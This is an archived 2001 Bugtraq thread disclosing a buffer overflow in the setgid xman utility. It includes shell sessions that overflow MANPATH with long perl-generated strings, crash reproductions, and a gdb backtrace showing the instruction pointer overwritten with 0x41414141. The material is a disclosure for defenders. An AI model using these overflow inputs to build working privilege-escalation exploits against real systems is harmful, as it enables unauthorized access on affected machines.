Bugtraq mailing list archives
Re: suid xman 3.1.6 overflows
From: Matias Sedalo <s0t4ipv6 () shellcode com ar>
Date: Mon, 16 Jul 2001 03:16:11 -0400 (ART)
The file /usr/X11R6/bin/xman isn't setuid in slackware 7.1/7.2/8.0 but...

s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 7000'`
s0t4ipv6@gohan:~$ xman
Xman Error: No manual pages found.
s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 70000'`
s0t4ipv6@gohan:~$ xman
Segmentation fault
s0t4ipv6@gohan:~$ uname -a
Linux gohan 2.4.5 #4 SMP Thu Jul 12 22:22:32 ART 2001 i686 unknown

================================================================
Matias Sedalo.______________________http://www.shellcode.com.ar/

On Wed, 11 Jul 2001, KF wrote:
xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic overflow
srtxg () chanae alphanet ch is noted as the packager of this RPM. I do not know the author.

[root@linux lib]# ls -al `which xman`
-rwxr-sr-x 1 root man 41076 Jun 17 1998 /usr/X11R6/bin/xman*
[root@linux lib]# xman
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
[root@linux lib]# xman
Xman Error: Could not allocate memory for manual sections.
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
[root@linux lib]# xman
Segmentation fault
[root@linux lib]# gdb xman
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
(gdb) run
Starting program: /usr/X11R6/bin/xman
0x4022fb66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x4022fb66 in getenv () from /lib/libc.so.6
#1 0x0804bc47 in _start ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) info registers
eax 0xbffee784 -1073813628
ecx 0x804fb29 134544169
edx 0x805414c 134562124
ebx 0x40328f2c 1077055276
esp 0xbffec6fc 0xbffec6fc
ebp 0xbffec714 0xbffec714
esi 0x6 6
edi 0x41414141 1094795585
eip 0x4022fb66 0x4022fb66

-KF
Current thread:
- suid xman 3.1.6 overflows KF (Jul 15)
- Re: suid xman 3.1.6 overflows Matias Sedalo (Jul 16)